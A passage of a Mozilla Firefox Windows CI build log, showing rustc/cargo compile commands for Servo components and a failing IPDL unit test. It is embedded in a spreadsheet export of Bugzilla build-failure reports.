extra-filename=-85bef444428b9538 --out-dir 'z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps' --target x86_64-pc-windows-msvc -C 'linker=z:/build/build/src/build/cargo-linker.bat' -L 'dependency=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps' -L 'dependency=z:/build/workspace/obj-build\release\deps' --extern 'bitflags=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libbitflags-d27e72ae29703f37.rmeta' --extern 'cssparser=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libcssparser-e5a73c462f3dfa42.rmeta' --extern 'derive_more=z:/build/workspace/obj-build\release\deps\derive_more-cd6ced2782ef2c1e.dll' --extern 'fxhash=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libfxhash-86b5b99fd5dc5b87.rmeta' --extern 'log=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\liblog-c3e2ff1d6d2b1723.rmeta' --extern 'matches=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libmatches-a88dc28e32cb9bdc.rmeta' --extern 'phf=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libphf-954af1e2e64f7491.rmeta' --extern 'precomputed_hash=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libprecomputed_hash-3ec1b80f59926b97.rmeta' --extern 'servo_arc=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libservo_arc-05248f012d0ea28d.rmeta' --extern 'smallvec=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libsmallvec-9ea8846c49949c33.rmeta' --extern 'thin_slice=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libthin_slice-cb8532dc7e7ab20d.rmeta' --extern 'to_shmem=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libto_shmem-ee44f57fa8af8fe2.rmeta' --extern 'to_shmem_derive=z:/build/workspace/obj-build\release\deps\to_shmem_derive-09d8caedf83e7052.dll' -C opt-level=2 -C debuginfo=2 -C force-frame-pointers=yes --cap-lints warn -Ccodegen-units=1 -Zprofile -Cpanic=abort -Zpanic_abort_tests -Clink-dead-code -Coverflow-checks=off -C codegen-units=1`
[task 2020-07-27T00:01:07.250Z] 00:01:07     INFO -  check&gt;      Running `set CARGO='\\?\Z:\task_1595800870\fetches\rustc\bin\cargo.exe'&amp;&amp; set CARGO_MANIFEST_DIR='Z:\build\build\src\servo\components\selectors'&amp;&amp; set CARGO_PKG_AUTHORS='The Servo Project Developers'&amp;&amp; set CARGO_PKG_DESCRIPTION='CSS Selectors matching for Rust'&amp;&amp; set CARGO_PKG_HOMEPAGE=&amp;&amp; set CARGO_PKG_NAME=selectors&amp;&amp; set CARGO_PKG_REPOSITORY='https://github.com/servo/servo'&amp;&amp; set CARGO_PKG_VERSION=0.22.0&amp;&amp; set CARGO_PKG_VERSION_MAJOR=0&amp;&amp; set CARGO_PKG_VERSION_MINOR=22&amp;&amp; set CARGO_PKG_VERSION_PATCH=0&amp;&amp; set CARGO_PKG_VERSION_PRE=&amp;&amp; set OUT_DIR='z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\build\selectors-7571b0a8955ab4c2\out'&amp;&amp; set PATH='z:/build/workspace/obj-build\release\deps;Z:\task_1595800870\fetches\rustc\bin;z:\build\fetches\clang\bin;z:\build\fetches\clang\bin;z:\build\fetches\clang\bin;c:\Program Files\Mercurial;c:\mozilla-build\bin;c:\mozilla-build\kdiff3;c:\mozilla-build\moztools-x64\bin;c:\mozilla-build\mozmake;C:\mozilla-build\msys\bin;C:\mozilla-build\msys\local\bin;c:\mozilla-build\nsis-3.01;c:\mozilla-build\python;c:\mozilla-build\python\Scripts;c:\mozilla-build\python3;c:\Windows\system32;c:\Windows;c:\Windows\System32\Wbem;c:\Windows\System32\WindowsPowerShell\v1.0\;c:\Program Files\Amazon\cfn-bootstrap\;c:\Program Files (x86)\GNU\GnuPG\pub;c:\Program Files (x86)\Windows Kits\10\Windows Performance Toolkit\;c:\mozilla-build\python\lib\site-packages\pywin32_system32;z:/build/build/src/vs2017_15.8.4/VC/bin/HostX64/x64;C:\Users\task_1595800870\.cargo\bin;z:\build\.mozbuild\clang\bin;z:\build\.mozbuild\cbindgen;z:\build\.mozbuild\dump_syms;z:\build\.mozbuild\nasm;z:\build\.mozbuild\lucetc'&amp;&amp; z:/build/fetches/sccache/sccache.exe 'z:/build/fetches/rustc/bin/rustc.exe' --crate-name selectors 'servo\components\selectors\lib.rs' --error-format=json --json=diagnostic-rendered-ansi --emit=dep-info,link -C opt-level=3 --test -C metadata=e2e5971d17ef124f -C extra-filename=-e2e5971d17ef124f --out-dir 'z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps' --target x86_64-pc-windows-msvc -C 'linker=z:/build/build/src/build/cargo-linker.bat' -L 'dependency=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps' -L 'dependency=z:/build/workspace/obj-build\release\deps' --extern 'bitflags=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libbitflags-d27e72ae29703f37.rlib' --extern 'cssparser=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libcssparser-e5a73c462f3dfa42.rlib' --extern 'derive_more=z:/build/workspace/obj-build\release\deps\derive_more-cd6ced2782ef2c1e.dll' --extern 'fxhash=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libfxhash-86b5b99fd5dc5b87.rlib' --extern 'log=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\liblog-c3e2ff1d6d2b1723.rlib' --extern 'matches=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libmatches-a88dc28e32cb9bdc.rlib' --extern 'phf=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libphf-954af1e2e64f7491.rlib' --extern 'precomputed_hash=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libprecomputed_hash-3ec1b80f59926b97.rlib' --extern 'servo_arc=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libservo_arc-05248f012d0ea28d.rlib' --extern 'smallvec=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libsmallvec-9ea8846c49949c33.rlib' --extern 'thin_slice=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libthin_slice-cb8532dc7e7ab20d.rlib' --extern 'to_shmem=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libto_shmem-ee44f57fa8af8fe2.rlib' --extern 'to_shmem_derive=z:/build/workspace/obj-build\release\deps\to_shmem_derive-09d8caedf83e7052.dll' -C opt-level=2 -C debuginfo=2 -C force-frame-pointers=yes --cap-lints warn -Ccodegen-units=1 -Zprofile -Cpanic=abort -Zpanic_abort_tests -Clink-dead-code -Coverflow-checks=off -C codegen-units=1`
[task 2020-07-27T00:01:12.286Z] 00:01:12     INFO -  check&gt; mozmake.EXE[4]: Entering directory 'z:/build/workspace/obj-build/ipc/ipdl/test/ipdl'
[task 2020-07-27T00:01:12.286Z] 00:01:12     INFO -  check&gt; ....F.........................................................................................................................................
[task 2020-07-27T00:01:12.286Z] 00:01:12     INFO -  check&gt; ======================================================================
[task 2020-07-27T00:01:12.286Z] 00:01:12     INFO -  check&gt; FAIL: test (__main__.OkTestCase)
[task 2020-07-27T00:01:12.286Z] 00:01:12     INFO -  check&gt; OkTestCase test of "z:/build/build/src/ipc/ipdl/test/ipdl/ok/Punion_Comparable.ipdl"
[task 2020-07-27T00:01:12.286Z] 00:01:12     INFO -  check&gt; ----------------------------------------------------------------------
[task 2020-07-27T00:01:12.286Z] 00:01:12    ERROR -  check&gt; Traceback (most recent call last):
[task 2020-07-27T00:01:12.286Z] 00:01:12     INFO -  check&gt;   File "z:/build/build/src/ipc/ipdl/test/ipdl/runtests.py", line 16, in test
[task 2020-07-27T00:01:12.288Z] 00:01:12     INFO -  check&gt;     self.checkPassed()
[task 2020-07-27T00:01:12.288Z] 00:01:12     INFO -  check&gt;   File "z:/build/build/src/ipc/ipdl/test/ipdl/runtests.py", line 43, in checkPassed
[task 2020-07-27T00:01:12.288Z] 00:01:12     INFO -  check&gt;     self.assertTrue(self.compile.ok(), self.mkFailMsg())
[task 2020-07-27T00:01:12.288Z] 00:01:12     INFO -  check&gt; AssertionError: False is not true :
[task 2020-07-27T00:01:12.288Z] 00:01:12     INFO -  check&gt; ### Command: z:/build/workspace/obj-build/_virtualenvs/init_py3/Scripts/python.exe z:/build/build/src/ipc/ipdl/ipdl.py --sync-msg-list=z:/build/build/src/ipc/ipdl/test/ipdl/sync-messages.ini --msg-metadata=z:/build/build/src/ipc/ipdl/test/ipdl/message-metadata.ini -I z:/build/build/src/ipc/ipdl/test/ipdl/ok -d C:\Users\task_1595800870\AppData\Local\Temp\ipdl_unit_testede1cw9h z:/build/build/src/ipc/ipdl/test/ipdl/ok/Punion_Comparable.ipdl
[task 2020-07-27T00:01:12.288Z] 00:01:12     INFO -  check&gt; ### stderr:
[task 2020-07-27T00:01:12.288Z] 00:01:12    ERROR -  check&gt; z:\build\build\src\ipc\ipdl\test\ipdl\ok\Punion_Comparable.ipdl:9: error: Unknown sync IPC message Punion_Comparable::Msg
[task 2020-07-27T00:01:12.288Z] 00:01:12     INFO -  check&gt; Error: New sync IPC messages must be reviewed by an IPC peer and recorded in z:/build/build/src/ipc/ipdl/test/ipdl/sync-messages.ini
[task 2020-07-27T00:01:12.288Z] 00:01:12     INFO -  check&gt;
[task 2020-07-27T00:01:12.288Z] 00:01:12     INFO -  check&gt;
[task 2020-07-27T00:01:12.288Z] 00:01:12     INFO -  check&gt; ----------------------------------------------------------------------
[task 2020-07-27T00:01:12.289Z] 00:01:12     INFO -  check&gt; Ran 142 tests in 28.352s
[task 2020-07-27T00:01:12.289Z] 00:01:12     INFO -  check&gt;
[task 2020-07-27T00:01:12.289Z] 00:01:12     INFO -  check&gt; FAILED (failures=1)
[task 2020-07-27T00:01:12.289Z] 00:01:12     INFO -  check&gt; mozmake.EXE[4]: Leaving directory 'z:/build/workspace/obj-build/ipc/ipdl/test/ipdl'
[task 2020-07-27T00:01:13.135Z] 00:01:13     INFO -  check&gt;    Compiling malloc_size_of v0.0.1 (Z:\build\build\src\servo\components\malloc_size_of)
[task 2020-07-27T00:01:13.140Z] 00:01:13     INFO -  check&gt;      Running `set CARGO='\\?\Z:\task_1595800870\fetches\rustc\bin\cargo.exe'&amp;&amp; set CARGO_MANIFEST_DIR='Z:\build\build\src\servo\components\malloc_size_of'&amp;&amp; set CARGO_PKG_AUTHORS='The Servo Project Developers'&amp;&amp; set CARGO_PKG_DESCRIPTION=&amp;&amp; set CARGO_PKG_HOMEPAGE=&amp;&amp; set CARGO_PKG_NAME=malloc_size_of&amp;&amp; set CARGO_PKG_REPOSITORY=&amp;&amp; set CARGO_PKG_VERSION=0.0.1&amp;&amp; set CARGO_PKG_VERSION_MAJOR=0&amp;&amp; set CARGO_PKG_VERSION_MINOR=0&amp;&amp; set CARGO_PKG_VERSION_PATCH=1&amp;&amp; set CARGO_PKG_VERSION_PRE=&amp;&amp; set PATH='z:/build/workspace/obj-build\release\deps;Z:\task_1595800870\fetches\rustc\bin;z:\build\fetches\clang\bin;z:\build\fetches\clang\bin;z:\build\fetches\clang\bin;c:\Program Files\Mercurial;c:\mozilla-build\bin;c:\mozilla-build\kdiff3;c:\mozilla-build\moztools-x64\bin;c:\mozilla-build\mozmake;C:\mozilla-build\msys\bin;C:\mozilla-build\msys\local\bin;c:\mozilla-build\nsis-3.01;c:\mozilla-build\python;c:\mozilla-build\python\Scripts;c:\mozilla-build\python3;c:\Windows\system32;c:\Windows;c:\Windows\System32\Wbem;c:\Windows\System32\WindowsPowerShell\v1.0\;c:\Program Files\Amazon\cfn-bootstrap\;c:\Program Files (x86)\GNU\GnuPG\pub;c:\Program Files (x86)\Windows Kits\10\Windows Performance Toolkit\;c:\mozilla-build\python\lib\site-packages\pywin32_system32;z:/build/build/src/vs2017_15.8.4/VC/bin/HostX64/x64;C:\Users\task_1595800870\.cargo\bin;z:\build\.mozbuild\clang\bin;z:\build\.mozbuild\cbindgen;z:\build\.mozbuild\dump_syms;z:\build\.mozbuild\nasm;z:\build\.mozbuild\lucetc'&amp;&amp; z:/build/fetches/sccache/sccache.exe 'z:/build/fetches/rustc/bin/rustc.exe' --crate-name malloc_size_of 'servo\components\malloc_size_of\lib.rs' --error-format=json --json=diagnostic-rendered-ansi,artifacts --crate-type lib --emit=dep-info,metadata,link -C opt-level=2 -C metadata=5528806a75444da4 -C extra-filename=-5528806a75444da4 --out-dir 'z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps' --target x86_64-pc-windows-msvc -C 'linker=z:/build/build/src/build/cargo-linker.bat' -L 'dependency=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps' -L 'dependency=z:/build/workspace/obj-build\release\deps' --extern 'app_units=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libapp_units-6d4a763d53b1f027.rmeta' --extern 'cssparser=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libcssparser-e5a73c462f3dfa42.rmeta' --extern 'euclid=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libeuclid-18450e030de1a972.rmeta' --extern 'hashglobe=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libhashglobe-7e2c975f4846001e.rmeta' --extern 'selectors=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libselectors-85bef444428b9538.rmeta' --extern 'servo_arc=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libservo_arc-05248f012d0ea28d.rmeta' --extern 'smallbitvec=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libsmallbitvec-eb1932ac477a63d6.rmeta' --extern 'smallvec=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libsmallvec-9ea8846c49949c33.rmeta' --extern 'thin_slice=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libthin_slice-cb8532dc7e7ab20d.rmeta' --extern 'void=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libvoid-cc5d9168978f6752.rmeta' -C opt-level=2 -C debuginfo=2 -C force-frame-pointers=yes --cap-lints warn -Ccodegen-units=1 -Zprofile -Cpanic=abort -Zpanic_abort_tests -Clink-dead-code -Coverflow-checks=off -C codegen-units=1`
[task 2020-07-27T00:01:13.424Z] 00:01:13     INFO -  check&gt;    Compiling style_traits v0.0.1 (Z:\build\build\src\servo\components\style_traits)
[task 2020-07-27T00:01:13.429Z] 00:01:13     INFO -  check&gt;      Running `set CARGO='\\?\Z:\task_1595800870\fetches\rustc\bin\cargo.exe'&amp;&amp; set CARGO_MANIFEST_DIR='Z:\build\build\src\servo\components\style_traits'&amp;&amp; set CARGO_PKG_AUTHORS='The Servo Project Developers'&amp;&amp; set CARGO_PKG_DESCRIPTION=&amp;&amp; set CARGO_PKG_HOMEPAGE=&amp;&amp; set CARGO_PKG_NAME=style_traits&amp;&amp; set CARGO_PKG_REPOSITORY=&amp;&amp; set CARGO_PKG_VERSION=0.0.1&amp;&amp; set CARGO_PKG_VERSION_MAJOR=0&amp;&amp; set CARGO_PKG_VERSION_MINOR=0&amp;&amp; set CARGO_PKG_VERSION_PATCH=1&amp;&amp; set CARGO_PKG_VERSION_PRE=&amp;&amp; set PATH='z:/build/workspace/obj-build\release\deps;Z:\task_1595800870\fetches\rustc\bin;z:\build\fetches\clang\bin;z:\build\fetches\clang\bin;z:\build\fetches\clang\bin;c:\Program Files\Mercurial;c:\mozilla-build\bin;c:\mozilla-build\kdiff3;c:\mozilla-build\moztools-x64\bin;c:\mozilla-build\mozmake;C:\mozilla-build\msys\bin;C:\mozilla-build\msys\local\bin;c:\mozilla-build\nsis-3.01;c:\mozilla-build\python;c:\mozilla-build\python\Scripts;c:\mozilla-build\python3;c:\Windows\system32;c:\Windows;c:\Windows\System32\Wbem;c:\Windows\System32\WindowsPowerShell\v1.0\;c:\Program Files\Amazon\cfn-bootstrap\;c:\Program Files (x86)\GNU\GnuPG\pub;c:\Program Files (x86)\Windows Kits\10\Windows Performance Toolkit\;c:\mozilla-build\python\lib\site-packages\pywin32_system32;z:/build/build/src/vs2017_15.8.4/VC/bin/HostX64/x64;C:\Users\task_1595800870\.cargo\bin;z:\build\.mozbuild\clang\bin;z:\build\.mozbuild\cbindgen;z:\build\.mozbuild\dump_syms;z:\build\.mozbuild\nasm;z:\build\.mozbuild\lucetc'&amp;&amp; z:/build/fetches/sccache/sccache.exe 'z:/build/fetches/rustc/bin/rustc.exe' --crate-name style_traits 'servo\components\style_traits\lib.rs' --error-format=json --json=diagnostic-rendered-ansi,artifacts --crate-type lib --emit=dep-info,metadata,link -C opt-level=2 --cfg 'feature="gecko"' -C metadata=c40f1540e164aa32 -C extra-filename=-c40f1540e164aa32 --out-dir 'z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps' --target x86_64-pc-windows-msvc -C 'linker=z:/build/build/src/build/cargo-linker.bat' -L 'dependency=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps' -L 'dependency=z:/build/workspace/obj-build\release\deps' --extern 'app_units=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libapp_units-6d4a763d53b1f027.rmeta' --extern 'bitflags=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libbitflags-d27e72ae29703f37.rmeta' --extern 'cssparser=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libcssparser-e5a73c462f3dfa42.rmeta' --extern 'euclid=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libeuclid-18450e030de1a972.rmeta' --extern 'lazy_static=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\liblazy_static-2f5d2ed3a78f0432.rmeta' --extern 'malloc_size_of=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libmalloc_size_of-5528806a75444da4.rmeta' --extern 'malloc_size_of_derive=z:/build/workspace/obj-build\release\deps\malloc_size_of_derive-ea8a9552408cd39a.dll' --extern 'selectors=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libselectors-85bef444428b9538.rmeta' --extern 'serde=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libserde-82050e7b013c2f30.rmeta' --extern 'servo_arc=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libservo_arc-05248f012d0ea28d.rmeta' --extern 'to_shmem=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libto_shmem-ee44f57fa8af8fe2.rmeta' --extern 'to_shmem_derive=z:/build/workspace/obj-build\release\deps\to_shmem_derive-09d8caedf83e7052.dll' -C opt-level=2 -C debuginfo=2 -C force-frame-pointers=yes --cap-lints warn -Ccodegen-units=1 -Zprofile -Cpanic=abort -Zpanic_abort_tests -Clink-dead-code -Coverflow-checks=off -C codegen-units=1`
[task 2020-07-27T00:01:17.391Z] 00:01:17     INFO -  check&gt;    Compiling style v0.0.1 (Z:\build\build\src\servo\components\style)
[task 2020-07-27T00:01:17.401Z] 00:01:17     INFO -  check&gt;      Running `set CARGO='\\?\Z:\task_1595800870\fetches\rustc\bin\cargo.exe'&amp;&amp; set CARGO_MANIFEST_DIR='Z:\build\build\src\servo\components\style'&amp;&amp; set CARGO_PKG_AUTHORS='The Servo Project Developers'&amp;&amp; set CARGO_PKG_DESCRIPTION=&amp;&amp; set CARGO_PKG_HOMEPAGE=&amp;&amp; set CARGO_PKG_NAME=style&amp;&amp; set CARGO_PKG_REPOSITORY=&amp;&amp; set CARGO_PKG_VERSION=0.0.1&amp;&amp; set CARGO_PKG_VERSION_MAJOR=0&amp;&amp; set CARGO_PKG_VERSION_MINOR=0&amp;&amp; set CARGO_PKG_VERSION_PATCH=1&amp;&amp; set CARGO_PKG_VERSION_PRE=&amp;&amp; set OUT_DIR='z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\build\style-a81bf4a6e664d004\out'&amp;&amp; set PATH='z:/build/workspace/obj-build\release\deps;Z:\task_1595800870\fetches\rustc\bin;z:\build\fetches\clang\bin;z:\build\fetches\clang\bin;z:\build\fetches\clang\bin;c:\Program Files\Mercurial;c:\mozilla-build\bin;c:\mozilla-build\kdiff3;c:\mozilla-build\moztools-x64\bin;c:\mozilla-build\mozmake;C:\mozilla-build\msys\bin;C:\mozilla-build\msys\local\bin;c:\mozilla-build\nsis-3.01;c:\mozilla-build\python;c:\mozilla-build\python\Scripts;c:\mozilla-build\python3;c:\Windows\system32;c:\Windows;c:\Windows\System32\Wbem;c:\Windows\System32\WindowsPowerShell\v1.0\;c:\Program Files\Amazon\cfn-bootstrap\;c:\Program Files (x86)\GNU\GnuPG\pub;c:\Program Files (x86)\Windows Kits\10\Windows Performance Toolkit\;c:\mozilla-build\python\lib\site-packages\pywin32_system32;z:/build/build/src/vs2017_15.8.4/VC/bin/HostX64/x64;C:\Users\task_1595800870\.cargo\bin;z:\build\.mozbuild\clang\bin;z:\build\.mozbuild\cbindgen;z:\build\.mozbuild\dump_syms;z:\build\.mozbuild\nasm;z:\build\.mozbuild\lucetc'&amp;&amp; z:/build/fetches/sccache/sccache.exe 'z:/build/fetches/rustc/bin/rustc.exe' --crate-name style --edition=2018 'servo\components\style\lib.rs' --error-format=json --json=diagnostic-rendered-ansi,artifacts --crate-type lib --emit=dep-info,metadata,link -C opt-level=2 --cfg 'feature="bindgen"' --cfg 'feature="gecko"' --cfg 'feature="gecko_profiler"' --cfg 'feature="nsstring"' --cfg 'feature="regex"' --cfg 'feature="serde"' --cfg 'feature="toml"' -C metadata=4d508932c6bb8d0c -C extra-filename=-4d508932c6bb8d0c --out-dir 'z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps' --target x86_64-pc-windows-msvc -C 'linker=z:/build/build/src/build/cargo-linker.bat' -L 'dependency=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps' -L 'dependency=z:/build/workspace/obj-build\release\deps' --extern 'app_units=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libapp_units-6d4a763d53b1f027.rmeta' --extern 'arrayvec=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libarrayvec-83e7b7e84f1439cc.rmeta' --extern 'atomic_refcell=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libatomic_refcell-ee867ac943b57082.rmeta' --extern 'bitflags=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libbitflags-d27e72ae29703f37.rmeta' --extern 'byteorder=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libbyteorder-ffc96352bf3d58c4.rmeta' --extern 'cssparser=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libcssparser-e5a73c462f3dfa42.rmeta' --extern 'derive_more=z:/build/workspace/obj-build\release\deps\derive_more-cd6ced2782ef2c1e.dll' --extern 'euclid=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libeuclid-18450e030de1a972.rmeta' --extern 'fallible=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libfallible-eecbc47b853cec85.rmeta' --extern 'fxhash=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libfxhash-86b5b99fd5dc5b87.rmeta' --extern 'hashbrown=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libhashbrown-76fe9c580edc65ac.rmeta' --extern 'hashglobe=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libhashglobe-7e2c975f4846001e.rmeta' --extern 'indexmap=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libindexmap-832f387ae139f215.rmeta' --extern 'itertools=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libitertools-d5af0d7f580c689f.rmeta' --extern 'itoa=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libitoa-60ad90a4faf6c240.rmeta' --extern 'lazy_static=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\liblazy_static-2f5d2ed3a78f0432.rmeta' --extern 'log=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\liblog-c3e2ff1d6d2b1723.rmeta' --extern 'malloc_size_of=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libmalloc_size_of-5528806a75444da4.rmeta' --extern 'malloc_size_of_derive=z:/build/workspace/obj-build\release\deps\malloc_size_of_derive-ea8a9552408cd39a.dll' --extern 'matches=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libmatches-a88dc28e32cb9bdc.rmeta' --extern 'debug_unreachable=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libdebug_unreachable-28859f0be804e4fb.rmeta' --extern 'nsstring=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libnsstring-b391c8a7b52abeee.rmeta' --extern 'num_derive=z:/build/workspace/obj-build\release\deps\num_derive-be955456fb85a8d5.dll' --extern 'num_integer=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libnum_integer-a744f549dd280ead.rmeta' --extern 'num_traits=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libnum_traits-c19f29482ae61981.rmeta' --extern 'num_cpus=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libnum_cpus-440a4553fdabc3a4.rmeta' --extern 'owning_ref=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libowning_ref-e652e821fe346130.rmeta' --extern 'parking_lot=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libparking_lot-0546d067fa75cb20.rmeta' --extern 'precomputed_hash=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libprecomputed_hash-3ec1b80f59926b97.rmeta' --extern 'rayon=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\librayon-dd31ed0e4cc07315.rmeta' --extern 'selectors=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libselectors-85bef444428b9538.rmeta' --extern 'serde=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libserde-82050e7b013c2f30.rmeta' --extern 'servo_arc=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libservo_arc-05248f012d0ea28d.rmeta' --extern 'smallbitvec=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libsmallbitvec-eb1932ac477a63d6.rmeta' --extern 'smallvec=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libsmallvec-9ea8846c49949c33.rmeta' --extern 'static_prefs=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libstatic_prefs-bf8deb671dd53e89.rmeta' --extern 'style_derive=z:/build/workspace/obj-build\release\deps\style_derive-4a3e8d5fb2721665.dll' --extern 'style_traits=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libstyle_traits-c40f1540e164aa32.rmeta' --extern 'thin_slice=z:/build/workspace/obj-build\x86_64-pc-windows-msvc\release\deps\libth</t>
        </is>
      </c>
      <c r="X6351" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6352">
      <c r="A6352" t="n">
        <v>1527227</v>
      </c>
      <c r="B6352" t="inlineStr">
        <is>
          <t>2019-02-11 21:42:23 -0800</t>
        </is>
      </c>
      <c r="C6352" t="inlineStr">
        <is>
          <t>Infra ERROR: Rust compiler 1.31.0-nightly is too old. | make: *** [configure] Error 1</t>
        </is>
      </c>
      <c r="D6352" t="inlineStr">
        <is>
          <t>2019-03-25 17:13:46 -0700</t>
        </is>
      </c>
      <c r="E6352" t="n">
        <v>1</v>
      </c>
      <c r="F6352" t="n">
        <v>1</v>
      </c>
      <c r="G6352" t="n">
        <v>7</v>
      </c>
      <c r="H6352" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6352" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J6352" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6352" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6352" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6352" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6352" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6352" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6352" t="inlineStr"/>
      <c r="Q6352" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R6352" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6352" t="inlineStr">
        <is>
          <t>mozilla67</t>
        </is>
      </c>
      <c r="T6352" t="n">
        <v>1</v>
      </c>
      <c r="U6352" t="n">
        <v>0</v>
      </c>
      <c r="V6352" t="n">
        <v>6</v>
      </c>
      <c r="W6352" t="inlineStr">
        <is>
          <t>#[markdown(off)]
Filed by: btara [at] mozilla.com
https://treeherder.mozilla.org/logviewer.html#?job_id=227839017&amp;repo=mozilla-central
https://queue.taskcluster.net/v1/task/DRrPdyG_RcehqNJ6yJRdbQ/runs/0/artifacts/public/logs/live_backing.log
[task 2019-02-12T05:33:29.336Z] 05:33:29     INFO -  checking whether the C++ compiler supports -Wformat-overflow=2... no
[task 2019-02-12T05:33:29.493Z] 05:33:29     INFO -  checking whether the C compiler supports -Wno-gnu-zero-variadic-macro-arguments... no
